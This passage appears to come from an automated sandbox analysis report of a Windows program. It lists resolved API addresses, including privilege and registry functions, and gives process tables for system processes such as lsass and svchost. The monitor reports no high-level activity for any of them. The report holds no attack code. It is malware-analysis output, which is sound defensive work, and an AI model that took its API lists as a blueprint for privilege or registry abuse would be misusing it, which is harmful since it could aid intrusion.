| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-22 14:10:13 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 20348752038 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #42: System
0
0
| Information | Value |
|---|---|
| ID | #42 |
| File Name | System |
| Command Line | - |
| Initial Working Directory | - |
| Monitor | Start Time: 00:02:25, Reason: Created Daemon |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4 |
| Parent PID | 0x144 (c:\windows\system32\smss.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
12B8
0x
12B4
0x
12B0
0x
12AC
0x
12A8
0x
12A4
0x
12A0
0x
129C
0x
1298
0x
1294
0x
1290
0x
544
0x
190
0x
1050
0x
104C
0x
EC0
0x
4D0
0x
F0C
0x
E0
0x
F2C
0x
CF4
0x
9E0
0x
4AC
0x
F24
0x
7A8
0x
824
0x
9E8
0x
D84
0x
1A4
0x
B0
0x
124
0x
FF8
0x
FF4
0x
128
0x
C4
0x
E48
0x
2C
0x
30
0x
0
0x
B1C
0x
B18
0x
BC
0x
A20
0x
9CC
0x
994
0x
8A0
0x
880
0x
10
0x
50C
0x
4D4
0x
8
0x
64
0x
7E0
0x
6B0
0x
630
0x
B8
0x
34
0x
600
0x
5BC
0x
84
0x
100
0x
104
0x
6C
0x
168
0x
3AC
0x
1C4
0x
1C8
0x
18C
0x
70
0x
8C
0x
28
0x
30C
0x
40
0x
17C
0x
60
0x
16C
0x
20C
0x
140
0x
68
0x
74
0x
20
0x
1CC
0x
1C0
0x
1BC
0x
1B8
0x
1B4
0x
1B0
0x
A4
0x
E8
0x
54
0x
188
0x
130
0x
C0
0x
120
0x
50
0x
D4
0x
134
0x
160
0x
164
0x
B4
0x
A8
0x
88
0x
14C
0x
154
0x
1C
0x
F0
0x
8
0x
F4
0x
14
0x
18
0x
FC
0x
C
0x
4C
0x
10AC
|
Process #43: smss.exe
0
0
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\system32\smss.exe |
| Command Line | \SystemRoot\System32\smss.exe |
| Initial Working Directory | C:\WINDOWS |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x144 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
1F4
0x
150
0x
148
|
Process #44: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x19c |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
6F4
0x
304
0x
244
0x
240
0x
204
0x
1E0
0x
1DC
0x
1D8
0x
1D0
0x
1A8
|
Process #45: wininit.exe
0
0
| Information | Value |
|---|---|
| ID | #45 |
| File Name | c:\windows\system32\wininit.exe |
| Command Line | wininit.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1ec |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
294
0x
24C
0x
23C
0x
208
0x
200
0x
1F0
|
Process #46: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #46 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1f8 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
6F8
0x
354
0x
27C
0x
278
0x
264
0x
21C
0x
230
0x
22C
0x
228
0x
220
0x
218
0x
214
|
Process #47: winlogon.exe
0
0
| Information | Value |
|---|---|
| ID | #47 |
| File Name | c:\windows\system32\winlogon.exe |
| Command Line | winlogon.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x234 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E38
0x
380
0x
360
0x
274
0x
268
0x
238
|
Process #48: services.exe
0
0
| Information | Value |
|---|---|
| ID | #48 |
| File Name | c:\windows\system32\services.exe |
| Command Line | C:\WINDOWS\system32\services.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x250 |
| Parent PID | 0x1ec (c:\windows\system32\wininit.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
1058
0x
694
0x
158
0x
160
0x
F8
0x
3F0
0x
3EC
0x
3E8
0x
3E4
0x
3DC
0x
310
0x
2BC
0x
2A8
0x
2A4
0x
FF0
|
Process #49: lsass.exe
0
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\system32\lsass.exe |
| Command Line | C:\WINDOWS\system32\lsass.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x258 |
| Parent PID | 0x1ec (c:\windows\system32\wininit.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeCreateTokenPrivilege, SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
12FC
0x
11E8
0x
1090
0x
E68
0x
3BC
0x
370
0x
298
0x
290
0x
28C
0x
288
0x
284
|
Process #50: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #50 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k DcomLaunch |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2b4 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
B00
0x
AFC
0x
95C
0x
8E4
0x
8B8
0x
75C
0x
758
0x
45C
0x
454
0x
430
0x
314
0x
2FC
0x
3C8
0x
3B8
0x
3B4
0x
350
0x
33C
0x
330
0x
320
0x
308
0x
2B8
0x
4A4
|
Process #51: fontdrvhost.exe
0
0
| Information | Value |
|---|---|
| ID | #51 |
| File Name | c:\windows\system32\fontdrvhost.exe |
| Command Line | "fontdrvhost.exe" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2c0 |
| Parent PID | 0x234 (c:\windows\system32\winlogon.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | S-1-5-96-0-1 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
2E4
0x
2E0
0x
2DC
0x
2D8
0x
2C4
|
Process #52: fontdrvhost.exe
0
0
| Information | Value |
|---|---|
| ID | #52 |
| File Name | c:\windows\system32\fontdrvhost.exe |
| Command Line | "fontdrvhost.exe" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2c8 |
| Parent PID | 0x1ec (c:\windows\system32\wininit.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | S-1-5-96-0-0 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
2F8
0x
2F4
0x
2F0
0x
2EC
0x
2CC
|
Process #53: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #53 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k RPCSS |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x318 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
94C
0x
948
0x
944
0x
940
0x
574
0x
458
0x
18C
0x
3E0
0x
358
0x
34C
0x
348
0x
338
0x
334
0x
32C
0x
31C
|
Process #54: dwm.exe
0
0
| Information | Value |
|---|---|
| ID | #54 |
| File Name | c:\windows\system32\dwm.exe |
| Command Line | "dwm.exe" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x374 |
| Parent PID | 0x234 (c:\windows\system32\winlogon.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | Window Manager\DWM-1 |
| Enabled Privileges | SeIncreaseBasePriorityPrivilege, SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
328
0x
17C
0x
2A0
0x
24C
0x
16C
0x
1E8
0x
1FC
0x
3B0
0x
3A4
0x
398
0x
378
|
Process #55: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #55 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3c0 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
125C
0x
11F0
0x
11CC
0x
10A4
0x
1078
0x
1048
0x
1040
0x
103C
0x
F28
0x
EE4
0x
714
0x
F40
0x
754
0x
48C
0x
F50
0x
F5C
0x
DA4
0x
B64
0x
D74
0x
D54
0x
A34
0x
A6C
0x
D4C
0x
794
0x
FF4
0x
60
0x
D38
0x
ECC
0x
2E8
0x
2D0
0x
DD8
0x
270
0x
260
0x
210
0x
8F4
0x
DF4
0x
4C4
0x
4B8
0x
EC4
0x
A50
0x
A3C
0x
A30
0x
A18
0x
9C4
0x
9AC
0x
9A4
0x
9A0
0x
99C
0x
998
0x
990
0x
988
0x
980
0x
970
0x
96C
0x
968
0x
960
0x
954
0x
950
0x
93C
0x
938
0x
924
0x
87C
0x
80C
0x
808
0x
4DC
0x
7DC
0x
7D4
0x
7D0
0x
7C0
0x
730
0x
6F0
0x
6EC
0x
664
0x
59C
0x
554
0x
4B4
0x
44C
0x
448
0x
428
0x
418
0x
414
0x
35C
0x
340
0x
3A0
0x
38C
0x
364
0x
248
0x
280
0x
29C
0x
188
0x
3C4
0x
11D8
0x
11F8
0x
11D4
0x
1214
0x
1218
0x
1228
0x
E30
0x
124C
0x
10E4
0x
115C
0x
390
0x
13B4
0x
E08
0x
E28
0x
11E8
0x
12F0
0x
1218
0x
122C
0x
11B8
|
Process #56: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #56 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3d0 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A1C
0x
A08
0x
A04
0x
9C8
0x
9A8
0x
984
0x
978
0x
904
0x
8B0
0x
84C
0x
848
0x
81C
0x
804
0x
494
0x
434
0x
7E8
0x
7E4
0x
7D8
0x
7C8
0x
78C
0x
76C
0x
768
0x
764
0x
760
0x
624
0x
1B0
0x
3D4
|
Process #57: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #57 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3f4 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1364
0x
36C
0x
384
0x
F1C
0x
F08
0x
EF8
0x
EDC
0x
EAC
0x
62C
0x
464
0x
460
0x
450
0x
424
0x
420
0x
41C
0x
410
0x
194
0x
198
0x
3F8
0x
3D8
0x
474
0x
1258
0x
1250
0x
1190
0x
E0C
|
Process #58: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #58 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
